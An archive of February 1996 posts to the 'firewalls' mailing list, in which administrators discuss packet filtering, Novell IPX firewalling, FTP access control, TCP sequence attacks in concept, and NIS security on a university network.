From firewalls-owner Thu Feb 1 00:38:26 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id AAA27720 for firewalls-outgoing; Thu, 1 Feb 1996 00:34:35 -0800 (PST) Received: from gatekeeper.n-i.nhs.uk (gatekeeper.n-i.nhs.uk [194.72.228.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id AAA27715 for ; Thu, 1 Feb 1996 00:34:28 -0800 (PST) Received: from dismail.dis.n-i.nhs.uk by gatekeeper.n-i.nhs.uk; (5.65/1.1.8.2/23May95-1119AM) id AA06273; Thu, 1 Feb 1996 08:33:28 GMT Received: from cc:Mail by dis.n-i.nhs.uk id AA823192503; Thu, 01 Feb 96 08:33:08 GMT Date: Thu, 01 Feb 96 08:33:08 GMT From: "MCARDLE MARK" Message-Id: <9601018231.AA823192503@dis.n-i.nhs.uk> To: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Does anyone know of a version of screend that runs on either DGUX, AIX, HPUX or LINUX. We are currently using a Digital Firewall and are looking at the DGUX DSO containment firewall. Thanks in advance Mark McArdle mmcardle@dis.n-i.nhs.uk http://www.dis.n-i.nhs.uk From firewalls-owner Thu Feb 1 01:53:37 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id BAA01105 for firewalls-outgoing; Thu, 1 Feb 1996 01:42:30 -0800 (PST) Received: from hp9000.ensi.rnrt.tn ([193.95.17.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id BAA01061 for ; Thu, 1 Feb 1996 01:42:11 -0800 (PST) Received: from [193.95.17.17] by hp9000.ensi.rnrt.tn with SMTP (16.6/16.2) id AA01942; Thu, 1 Feb 96 10:40:33 +0100 Message-Id: <31108C2A.210F@ensi.rnrt.tn> Date: Thu, 01 Feb 1996 10:47:22 +0100 From: Mondher Maddouri Organization: E.N.S.I, Ecole Nationale des Sciences de l'Informatiques X-Mailer: Mozilla 2.0b5 (Win95; I) Mime-Version: 1.0 To: tunisia@univ-lyon1.fr, firewalls@GreatCircle.COM Subject: Card driver, thanks Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi every one, thank you very match for your help about the card drivers under Unix. Particularly, I thank Guettari, for his help full answer. sincerely, mondher From firewalls-owner Thu Feb 1 02:09:08 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id BAA01222 for firewalls-outgoing; Thu, 1 Feb 1996 01:45:27 -0800 (PST) Received: from hp9000.ensi.rnrt.tn ([193.95.17.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id BAA01207 for ; Thu, 1 Feb 1996 01:45:14 -0800 (PST) Received: from [193.95.17.17] by hp9000.ensi.rnrt.tn with SMTP (16.6/16.2) id AA01945; Thu, 1 Feb 96 10:44:44 +0100 Message-Id: <31108D25.723D@ensi.rnrt.tn> Date: Thu, 01 Feb 1996 10:51:33 +0100 From: Mondher Maddouri Organization: E.N.S.I, Ecole Nationale des Sciences de l'Informatiques X-Mailer: Mozilla 2.0b5 (Win95; I) Mime-Version: 1.0 To: firewalls@GreatCircle.COM, tunisia@univ-lyon1.fr Subject: Securing an anonymous ftp acces Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi every one, does any of you can send me informations about how can I install an ftp server, and how can I controlle the acces of this ftp server, in a way that I can autoraize only some adresses or some users to y acceed. Tahnk match, maddouri@ensi.rnrt.tn From firewalls-owner Thu Feb 1 02:39:33 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id CAA03205 for firewalls-outgoing; Thu, 1 Feb 1996 02:33:38 -0800 (PST) Received: from ismael.gmv.es ([193.127.51.205]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id CAA03191 for ; Thu, 1 Feb 1996 02:33:26 -0800 (PST) Received: by ismael.gmv.es; id LAA05107; Thu, 1 Feb 1996 11:33:30 +0100 Received: from melmac.gmv.es(193.127.48.3) by ismael.gmv.es via smap (T3.1) id xma005105; Thu, 1 Feb 96 11:33:07 +0100 Received: by gmv.es (4.1/GMV-1.10) id AA29262; Thu, 1 Feb 96 11:32:33 +0100 To: gmv-gw-lists-firewalls@gmv.es Path: not-for-mail From: jsanchez@esegi.es (Julio Sanchez) Newsgroups: gmv.gw-lists.firewalls Subject: Re: Sequence Number Attacks Date: 1 Feb 1996 10:32:33 GMT Organization: SGI Soluciones Globales Internet Lines: 21 Message-Id: <4eq4s1$ruv@melmac.gmv.es> References: <199601201904.OAA26032@goffer.cb.att.com> Nntp-Posting-Host: melmac.gmv.es X-Newsreader: TIN [UNIX 1.3 950824BETA PL0] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk C Matthew Curtin (cmcurtin@goffer.cb.att.com) wrote: : : Now, say I'm a Bad Guy on the network somewhere between you and your : destination. Using the TCP sequence number attack, I fool your : destination into thinking that I'm you, and I take over your : session. The end result is that you are dropped, and I have simply : taken over from where you left off. The TCP sequence number attack mentioned was about TCP sequence number *guessing*. If you are in between, you know the sequence numbers. What you describe is possible, but it is not the kind of attack being described. It is usually called session hikacking or TCP splicing. All the best, -- Julio Sanchez, SGI Soluciones Globales Internet Tel/Fax: 91/804 14 05 WWW: http://www.esegi.es jsanchez@esegi.es jsanchez@gmv.es PGP Key fingerprint = E5 29 93 6F 41 4E 00 E2 90 11 A1 8C 72 D0 DE 71 From firewalls-owner Thu Feb 1 02:39:36 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id BAA01186 for firewalls-outgoing; Thu, 1 Feb 1996 01:44:15 -0800 (PST) Received: from bb.hks.net (bb.hks.net [199.183.60.11]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id BAA01173 for ; Thu, 1 Feb 1996 01:44:05 -0800 (PST) Received: from old-bb.hks.net (old-bb.hks.net [199.183.60.22]) by bb.hks.net (8.7/8.7-hks1) with SMTP id EAA26805 for ; Thu, 1 Feb 1996 04:40:32 -0500 Received: (from field@localhost) by old-bb.hks.net (8.6.9/8.6.9-bb2) id EAA09374 for firewalls@bb.hks.net; Thu, 1 Feb 1996 04:39:38 -0500 Received: from GATEWAY by bb.com with netnews for firewalls@bb.hks.net (firewalls@bb.hks.net) To: firewalls@bb.hks.net Date: 1 Feb 1996 04:40:25 -0500 From: bressen@hks.net (Andrew K. Bressen) Message-ID: <4eq1q9$q58@bb.hks.net> Organization: HKS.net References: <199601170108.RAA03101@phoenix> Subject: Re: Internet-access from Novell Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm confronting the same issue with a client right now, only with an added problem... more on that; first, here is a summary of what I've seen mentioned here and elsewhere, plus pointers to the PC magazine reviews of same: PC Magazine overview article http://www.zdnet.com/~pcmag/1413/pcm00155.htm Internet Junction (now Cisco) Passport http://www.ij.com/ http://www.zdnet.com/~pcmag/1413/pcm00156.htm review runs on an NT box Novix Firefox http://www.novix.com/ http://www.zdnet.com/~pcmag/1413/pcm00159.htm NLM Performance Technology Instant Internet http://www.perftech.com/ http://www.zdnet.com/~pcmag/1413/pcm00157.htm comes with hardware Internetware IWare Connect http://www.internetware.com/ http://www.zdnet.com/~pcmag/1413/pcm00158.htm NLM Frontier Tech CyberJunction http://www.frontiertech.com/products/cyjunctn.htm runs on an NT box (I had no problem finding info on this site...) Anybody got any others? Please cc me on replies. From firewalls-owner Thu Feb 1 02:53:24 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id CAA03272 for firewalls-outgoing; Thu, 1 Feb 1996 02:35:18 -0800 (PST) Received: from bb.hks.net (bb.hks.net [199.183.60.11]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id CAA03259 for ; Thu, 1 Feb 1996 02:35:08 -0800 (PST) Received: from old-bb.hks.net (old-bb.hks.net [199.183.60.22]) by bb.hks.net (8.7/8.7-hks1) with SMTP id FAA27068 for ; Thu, 1 Feb 1996 05:31:37 -0500 Received: (from field@localhost) by old-bb.hks.net (8.6.9/8.6.9-bb2) id FAA09622 for firewalls@bb.hks.net; Thu, 1 Feb 1996 05:30:43 -0500 Received: from GATEWAY by bb.com with netnews for firewalls@bb.hks.net (firewalls@bb.hks.net) To: firewalls@bb.hks.net Date: 1 Feb 1996 05:31:32 -0500 From: bressen@hks.net (Andrew K. Bressen) Message-ID: <4eq4q4$qde@bb.hks.net> Organization: HKS.net References: <199601170108.RAA03101@phoenix> Subject: Re: Internet-access from Novell Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Here's the worse problem I mentioned. I've grepped over 9000 archived articles of this group and found no mention of how to firewall novell boxes from each other. I have a client in the financial industry who has a market data feed from a provider. The market data feed is provided by a novell server on a leased line, with special client software for the users. How do I protect said client from, say, a disgruntled mailroom employee at the provider end, bent on hacking on the clients network? I'm not even sure what novell uses in lieu of tcp/udp ports; pointers to IPX/SPX docs, and the Novell equivalent of an /etc/services file would be most appreciated. Are there any IPX/SPX packet filters available? Are there any IPX proxy server firewalls available? CJC from Novell mentioned their existence, but gave little other info. Of course I'll start by recommending that the market data feed box go onto its own ethernet segment, and that IP traffic is not forwarded on or off of that segment. From firewalls-owner Thu Feb 1 03:09:39 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id CAA02542 for firewalls-outgoing; Thu, 1 Feb 1996 02:19:00 -0800 (PST) Received: from bb.hks.net (bb.hks.net [199.183.60.11]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id CAA02520 for ; Thu, 1 Feb 1996 02:18:46 -0800 (PST) Received: from old-bb.hks.net (old-bb.hks.net [199.183.60.22]) by bb.hks.net (8.7/8.7-hks1) with SMTP id FAA26975 for ; Thu, 1 Feb 1996 05:15:13 -0500 Received: (from field@localhost) by old-bb.hks.net (8.6.9/8.6.9-bb2) id FAA09560 for firewalls@bb.hks.net; Thu, 1 Feb 1996 05:14:20 -0500 Received: from GATEWAY by bb.com with netnews for firewalls@bb.hks.net (firewalls@bb.hks.net) To: firewalls@bb.hks.net Date: 1 Feb 1996 05:15:08 -0500 From: bressen@hks.net (Andrew K. Bressen) Message-ID: <4eq3rc$qal@bb.hks.net> Organization: HKS.net References: <199601170108.RAA03101@phoenix> Subject: Re: Internet-access from Novell Sender: firewalls-owner@GreatCircle.COM Precedence: bulk My questions about the IPX-IP gateway products I just posted about (Novix, Internet Junction Passport, Cyberjunction, Instant Internet, and Iware Connect) are as follows: * given that they have their own winsocks, do they work with windows95? * how about with windows NT? given IP2IPX ISP----router----| |-------Novell Clients I believe that NT can be a Novell client as well as a LanManager client; if one is running NT with IP turned off, can an alternate winsock be used? * I assume that the way these suckers work is to register each outbound TCP or UDP connection in some way and, acting as a proxy, assign a port number that will map to the specific PC. For example, I'm on novell node foo, and I telnet out, and the IP2IPX gateway assigns me port 9073 and knows that packets for that port get rehashed and sent to my PCs Winsock. how do they deal with UDP? if, for example, I wanted to NFS mount some internet archives on my Novell PC inside the proxy gateway, how is it going to deal? How long are the port numbers reserved for? Unless they are registered permanently, which might well run one out of ports entirely for a large network, how can the stateless connections be dealt with? From firewalls-owner Thu Feb 1 03:23:32 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id CAA01957 for firewalls-outgoing; Thu, 1 Feb 1996 02:02:43 -0800 (PST) Received: from ismael.gmv.es ([193.127.51.205]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id CAA01951 for ; Thu, 1 Feb 1996 02:02:23 -0800 (PST) Received: by ismael.gmv.es; id LAA04959; Thu, 1 Feb 1996 11:02:21 +0100 Received: from melmac.gmv.es(193.127.48.3) by ismael.gmv.es via smap (T3.1) id xma004955; Thu, 1 Feb 96 11:02:00 +0100 Received: by gmv.es (4.1/GMV-1.10) id AA28631; Thu, 1 Feb 96 11:01:25 +0100 Date: Thu, 1 Feb 96 11:01:25 +0100 Message-Id: <9602011001.AA28631@gmv.es> From: Julio Sanchez To: Doug.Hughes@Eng.Auburn.EDU Cc: jsanchez@esegi.es, firewalls@greatcircle.com In-Reply-To: (message from Doug Hughes on Wed, 31 Jan 1996 08:29:39 -0600) Subject: Re: how secure is NIS Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > From: Doug Hughes > Date: Wed, 31 Jan 1996 08:29:39 -0600 > Cc: firewalls@greatcircle.com > > I think you are confusing our firewall with our external router. As this > wasn't made clear in the original post, that is a natural mistake. My point > was that the University as a whole has an external router that has a block > as opposed to allow strategy by necessity. There are several protocols that > we can all agree deserve blocking (RPC, NFS, rexec, etc). However, making > an allow list would be huge and unwieldy (while blocking all else). > Our firewall is actually part of the engineering network and does serve > to protect us from other depts outside of engineering in a limited fashion. > I wouldn't call it a real firewall as it uses tcp_wrappers, some scanner > detection, and other IDS type tools, but it serves its purpose admirably. Good, so you already have one or more internal firewalls. That was actually the point I was making, that a firewall protecting a University network from the Internet is silly most of the time. But the point being made in the thread by others is that RPC, etc. are not really securable. And then my other implicit point was that the University network at large is not protected very strongly. This is actually very common in Universities and is not necessarily wrong in itself. Only that everyone must be aware of this and no unwarranted expectations should be raised by anyone. You cannot be very open (like your departments require) and very protected at the same time. > The ruleset on the external router is quite small, unfortunately, and > necessitates a block vs. allow strategy. That, as you probably know, requires you to know what is dangerous and we don't really know that. At most, we think we know what things don't seem to be dangerous. And some people in the list will immediately point out that I am being too optimistic :-) > The actual firewall machines are under our direct control and are > self-consistent and wholly configured by us. > We do not rely upon the external router to be a panacea, but just to do the > little things that an External router can be good at: > 1) preventing external TCP/IP spoofing attacks Good, but in an open environment as yours it is probably very easy to get to some internal machine maybe even through approved means (accounts for research partners, student accounts whose passwords circulate around, etc.) and as soon as they've got a stronghold inside, the router (or a more restrictive firewall for that matter) is going to be of little help. > 2) preventing source routing Good again, but see above. > 3) blocking agreed upon services I have already commented on this, but see that some services cannot easily be mapped to filterese (source/dest, address/port, etc.). You you might be blocking the services that you consider dangerous *and* can be filtered. Notice the emphasis on "and". So, your network at large is not really very secure and cannot probably be secured without major rethinking/restructuring and a lot of consensus. At least you already have some networks more protected so it seems you are more aware of the issues that I had thought at first (so I apologize for jumping so fast). The Spanish University I mentioned did not seem to be, so the depth of the damage is unknown. No one knows how deep they got, but the fact that disguised sniffers were found is not comforting. Since all I know about this intrusion is second hand and off-the-record, it might be pure invention. So those considering asking (some already have), please refrain, I cannot tell who they are unless they come forward. But it is worth some thinking even if it just were an hypothetical case (similar cases have been reported before anyway). All the best, -- Julio Sanchez, SGI Soluciones Globales Internet Tel/Fax: 91/804 14 05 WWW: http://www.esegi.es jsanchez@esegi.es jsanchez@gmv.es PGP Key fingerprint = E5 29 93 6F 41 4E 00 E2 90 11 A1 8C 72 D0 DE 71 From firewalls-owner Thu Feb 1 03:53:33 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id DAA06508 for firewalls-outgoing; Thu, 1 Feb 1996 03:40:53 -0800 (PST) Received: from sentry.novo.dk (sentry.novo.dk [152.73.17.17]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id DAA06502 for ; Thu, 1 Feb 1996 03:40:37 -0800 (PST) Received: from eagle.novo.dk by sentry.novo.dk; (5.65v3.0/1.1.8.2/28Sep94-0345PM) id AA11949; Thu, 1 Feb 1996 12:39:50 +0100 Received: by eagle.novo.dk; (5.65/1.1.8.2/23Dec94-0959AM) id AA14317; Thu, 1 Feb 1996 12:39:49 +0100 From: "Finn T Andersen" Message-Id: <9602011239.ZM14289@eagle.novo.dk> Date: Thu, 1 Feb 1996 12:39:49 +0100 X-Mailer: Z-Mail (3.2.0 06sep94) To: firewalls@greatcircle.com Subject: NIS+ Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk There has been a lot of good information and suggestions about NIS recently, however, noone has mentioned anything about NIS+. I have heard that NIS+ should be a very secure system, but in fact I have never heard about anyone who was using it. Is it available, and on what platforms ? --- Finn Andersen -- Finn T Andersen +45 44 42 60 49 e-mail X.400 /c=dk/admd=dk400/prmd=novonordisk/s=fina Addr. Novo Nordisk A/S, Novo alle, 2880 Bagsvaerd DK From firewalls-owner Thu Feb 1 04:38:42 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA08862 for firewalls-outgoing; Thu, 1 Feb 1996 04:29:48 -0800 (PST) Received: from bb.hks.net (bb.hks.net [199.183.60.11]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id EAA08857 for ; Thu, 1 Feb 1996 04:29:43 -0800 (PST) Received: from lint.cisco.com (lint.cisco.com [171.68.235.77]) by bb.hks.net (8.7/8.7-hks1) with SMTP id HAA27466 for ; Thu, 1 Feb 1996 07:26:12 -0500 Received: from pferguso-pc (c1robo7.cisco.com [171.68.13.7]) by lint.cisco.com (8.6.10/CISCO.SERVER.1.1) with SMTP id EAA12352; Thu, 1 Feb 1996 04:21:08 -0800 Message-Id: <199602011221.EAA12352@lint.cisco.com> X-Sender: pferguso@lint.cisco.com X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 01 Feb 1996 07:21:46 -0500 To: bressen@hks.net (Andrew K. Bressen) From: Paul Ferguson Subject: Re: Internet-access from Novell Cc: firewalls@bb.hks.net Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 05:31 AM 2/1/96 -0500, Andrew K. Bressen wrote: > >I'm not even sure what novell uses in lieu of tcp/udp ports; >pointers to IPX/SPX docs, and the Novell equivalent of >an /etc/services file would be most appreciated. > >Are there any IPX/SPX packet filters available? > Yes -- they're called routers. :-) - paul -- Paul Ferguson || || Consulting Engineering || || Reston, Virginia USA |||| |||| tel: +1.703.716.9538 ..:||||||:..:||||||:.. e-mail: pferguso@cisco.com c i s c o S y s t e m s From firewalls-owner Thu Feb 1 04:53:34 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA08845 for firewalls-outgoing; Thu, 1 Feb 1996 04:26:58 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id EAA08831 for ; Thu, 1 Feb 1996 04:26:53 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-960123) id EAA25480; Thu, 1 Feb 1996 04:23:19 -0800 Received: from bb.hks.net(199.183.60.11) by mycroft via smap (V1.3mjr) id sma025478; Thu Feb 1 04:22:39 1996 Received: from big486.ed-com.com (big486.ed-com.com [38.253.238.200]) by bb.hks.net (8.7/8.7-hks1) with SMTP id HAA27437 for ; Thu, 1 Feb 1996 07:19:26 -0500 Received: by big486.ed-com.com with Microsoft Exchange (IMC 4.1.611) id <01BAF076.CCE53310@big486.ed-com.com>; Thu, 1 Feb 1996 07:27:54 -0500 Message-ID: From: Ed Woodrick To: "firewalls@bb.hks.net" Subject: RE: Internet-access from Novell Date: Thu, 1 Feb 1996 07:27:52 -0500 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.1.611 MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="---- =_NextPart_000_01BAF076.CCEB4D90" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. Contact your mail administrator for information about upgrading your reader to a version that supports MIME. ------ =_NextPart_000_01BAF076.CCEB4D90 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable I know that this is probably a radical answer, but what about using = Novel access permissions to restrict access to the data? I don't know = why you would want to go to the trouble of putting up firewalls when = just a simple permission change should work. It's a lot easier and I = expect a lot safer to perform security at the operating system level = than at the network level. Ed Woodrick ---------- From: bressen@hks.net[SMTP:bressen@hks.net] Sent: Thursday, February 01, 1996 5:31 AM To: firewalls@bb.hks.net Subject: Re: Internet-access from Novell Here's the worse problem I mentioned.=20 I've grepped over 9000 archived articles of this group and found no mention of how to firewall novell boxes from each other. I have a client in the financial industry who has a market data feed from a provider. The market data feed is provided by a novell server on a leased line, with special client software for the users. How do I protect said client from, say, a disgruntled mailroom employee at the provider end, bent on hacking on the clients network? I'm not even sure what novell uses in lieu of tcp/udp ports; pointers to IPX/SPX docs, and the Novell equivalent of=20 an /etc/services file would be most appreciated.=20 Are there any IPX/SPX packet filters available?=20 Are there any IPX proxy server firewalls available?=20 CJC from Novell mentioned their existence, but gave little other info.=20 Of course I'll start by recommending that the market data feed box go onto its own ethernet segment, and that IP traffic is=20 not forwarded on or off of that segment.=20 ------ =_NextPart_000_01BAF076.CCEB4D90-- From firewalls-owner Thu Feb 1 05:24:03 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA10396 for firewalls-outgoing; Thu, 1 Feb 1996 05:12:58 -0800 (PST) Received: from gwosi.telesc.gov.br (gwosi.telesc.gov.br [200.18.1.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA10293 for ; Thu, 1 Feb 1996 05:12:17 -0800 (PST) Received: by gwosi.telesc.gov.br (AIX 3.2/UCB 5.64/4.03) id AA28733; Thu, 1 Feb 1996 11:14:31 -0600 Date: Thu, 1 Feb 1996 11:08:35 -0600 (CST) From: Jane Ferreira Cunha Subject: What are MLS and TE? To: firewalls@greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Please, where can I find some explanation about MLS and TE? I've seen a lot of discussion about them, but so far I could understand it. Are they in a FAQ somewhere? TIA, Jane %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% % % % Jane Ferreira Cunha % % Network Manager % % TELESC % % Florianopolis - SC - Brasil % % % % Tel. +55 48 231-2600 % % Fax +55 48 231-2611 % % e-mail : jane@telesc.gov.br % % % %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% From firewalls-owner Thu Feb 1 05:38:31 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA10089 for firewalls-outgoing; Thu, 1 Feb 1996 05:08:17 -0800 (PST) Received: from lint.cisco.com (lint.cisco.com [171.68.235.77]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA10053 for ; Thu, 1 Feb 1996 05:08:08 -0800 (PST) Received: from pferguso-pc (c1robo7.cisco.com [171.68.13.7]) by lint.cisco.com (8.6.10/CISCO.SERVER.1.1) with SMTP id FAA18975; Thu, 1 Feb 1996 05:06:30 -0800 Message-Id: <199602011306.FAA18975@lint.cisco.com> X-Sender: pferguso@lint.cisco.com X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 01 Feb 1996 08:07:08 -0500 To: bressen@hks.net (Andrew K. Bressen) From: Paul Ferguson Subject: Re: Internet-access from Novell Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 05:15 AM 2/1/96 -0500, Andrew K. Bressen wrote: >My questions about the IPX-IP gateway products I just posted about >(Novix, Internet Junction Passport, Cyberjunction, Instant Internet, >and Iware Connect) are as follows: > > * given that they have their own winsocks, > do they work with windows95? > > * how about with windows NT? given > Internet Junction has support for both Win95 [client] and NT [server]. http://www.cisco.com/ - paul -- Paul Ferguson || || Consulting Engineering || || Reston, Virginia USA |||| |||| tel: +1.703.716.9538 ..:||||||:..:||||||:.. e-mail: pferguso@cisco.com c i s c o S y s t e m s From firewalls-owner Thu Feb 1 05:56:30 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA11916 for firewalls-outgoing; Thu, 1 Feb 1996 05:39:54 -0800 (PST) Received: from bb.hks.net (bb.hks.net [199.183.60.11]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id FAA11901 for ; Thu, 1 Feb 1996 05:39:46 -0800 (PST) Received: from bifrost.paladin.com (router.paladin.com [199.3.129.207]) by bb.hks.net (8.7/8.7-hks1) with SMTP id IAA27621 for ; Thu, 1 Feb 1996 08:36:14 -0500 Received: (from mail@localhost) by bifrost.paladin.com (8.6.12/8.6.9) id IAA01222; Thu, 1 Feb 1996 08:38:40 -0500 Received: from router.paladin.com(199.3.129.207) by bifrost.paladin.com via smap (V1.3) id sma001220; Thu Feb 1 08:38:37 1996 Date: Thu, 1 Feb 1996 08:38:36 -0500 (EST) From: Chris Woods To: "Andrew K. Bressen" cc: firewalls@bb.hks.net Subject: Re: Internet-access from Novell In-Reply-To: <4eq4q4$qde@bb.hks.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On 1 Feb 1996, Andrew K. Bressen wrote: [...] > I've grepped over 9000 archived articles of this group > and found no mention of how to firewall novell boxes from [...] > Are there any IPX/SPX packet filters available? I'm about to embark on the same journey. Knowing little or nothing about Novell, I know it is going to be a long journey. However, I can say that I know that there are IPX packet filters available. Livingston's Portmaster IRX router has the ability to route IPX, as well as the ability to create IPX filter rules. See http://www.livingston.com. Sorry I couldn't be of more assistance... Chris Woods Systems Administrator cjwoods@paladin.com Paladin Computing Solutions 617-273-4226 http://www.paladin.com "Never underestimate the destructive power of a backhoe." -Brent Chapman From firewalls-owner Thu Feb 1 06:23:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA13621 for firewalls-outgoing; Thu, 1 Feb 1996 06:20:44 -0800 (PST) Received: from dns.eng.auburn.edu (dns.eng.auburn.edu [131.204.10.13]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id GAA13614 for ; Thu, 1 Feb 1996 06:20:39 -0800 (PST) Received: from netman.eng.auburn.edu (netman.eng.auburn.edu [131.204.12.24]) by dns.eng.auburn.edu (v8.7.3/8.6.4) with ESMTP id IAA26943; Thu, 1 Feb 1996 08:19:41 -0600 (CST) From: Doug Hughes Received: from localhost (doug@localhost) by netman.eng.auburn.edu (8.6.4/8.6.4) id IAA25925; Thu, 1 Feb 1996 08:19:38 -0600 Date: Thu, 1 Feb 1996 08:19:38 -0600 Subject: Re: how secure is NIS To: jsanchez@gmv.es Cc: firewalls@greatcircle.com Message-Id: In-Reply-To: <9602011001.AA28631@gmv.es> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From: Julio Sanchez > >> From: Doug Hughes >> Date: Wed, 31 Jan 1996 08:29:39 -0600 >> Cc: firewalls@greatcircle.com >> >> I think you are confusing our firewall with our external router. As this >> wasn't made clear in the original post, that is a natural mistake. My point >> was that the University as a whole has an external router that has a block >> as opposed to allow strategy by necessity. There are several protocols that >> we can all agree deserve blocking (RPC, NFS, rexec, etc). However, making >> an allow list would be huge and unwieldy (while blocking all else). >> Our firewall is actually part of the engineering network and does serve >> to protect us from other depts outside of engineering in a limited fashion. >> I wouldn't call it a real firewall as it uses tcp_wrappers, some scanner >> detection, and other IDS type tools, but it serves its purpose admirably. > >Good, so you already have one or more internal firewalls. That was >actually the point I was making, that a firewall protecting a >University network from the Internet is silly most of the time. > >But the point being made in the thread by others is that RPC, etc. are >not really securable. > Hmm, I didn't hear that point, and I disagree. RPC and NIS are securable if you know what you are doing and you take the appropriate steps. I've outlined this before, and it's available on my WWW page, so I won't belabor the point here again. (Note: Secureable from outside attack, but less so from inside attack - an important distinction) >And then my other implicit point was that the University network at >large is not protected very strongly. This is actually very common in >Universities and is not necessarily wrong in itself. Only that >everyone must be aware of this and no unwarranted expectations should >be raised by anyone. You cannot be very open (like your departments >require) and very protected at the same time. > agreed. >> The ruleset on the external router is quite small, unfortunately, and >> necessitates a block vs. allow strategy. > >That, as you probably know, requires you to know what is dangerous and >we don't really know that. At most, we think we know what things don't >seem to be dangerous. And some people in the list will immediately >point out that I am being too optimistic :-) > The list of services that are known to be not used are blocked. (tcpmux, link, supdup, stuff like that). The list of known to be dangerous are blocked (NFS, RPC). Anything can be used dangerously. Somebody could setup a server on any port. Since arbitrary servers cannot be denied by fiat, this is one of those things we must live with and accept. >> The actual firewall machines are under our direct control and are >> self-consistent and wholly configured by us. >> We do not rely upon the external router to be a panacea, but just to do the >> little things that an External router can be good at: >> 1) preventing external TCP/IP spoofing attacks > >Good, but in an open environment as yours it is probably very easy to >get to some internal machine maybe even through approved means >(accounts for research partners, student accounts whose passwords >circulate around, etc.) and as soon as they've got a stronghold >inside, the router (or a more restrictive firewall for that matter) is >going to be of little help. > We have been trying to implement a one-time password or token based authentication mechanism for outsiders, but either the expense, or the hassle has made it impractical up till now. It's a matter that is constantly being revisited. If I had my druthers we would have secure telnet clients for access and one time passwords (not necessarily in combination, but possibly). Finding a multi-platform free secure telnet is an ongoing project. :) (STILL waiting on STel). tripwire, tcp_wrappers, rpcbind, modified logins, extensive logging, and a GUI IDS help us detect who's been 'bad or good'. We also watch patterns of students/profs logging in from external sites. I have an pseudo-AI perl tool that scans the wrappers logs and detects unusual patterns of user activity. It logs any connections outside the US, connections from multiple domains, and connections where RFC931 style identification does not match local ID, as well as users logging into a machine that they don't normally use. We've caught quite a few people doing password sharing this way. They don't do it again if they want to continue using their accounts. ;) > >So, your network at large is not really very secure and cannot >probably be secured without major rethinking/restructuring and a lot >of consensus. > It depends on what you refer to the network at large. The University (except possibly COE and some other small pockets) network is largely unsecured except for router filters. Yes, this is an undesirable 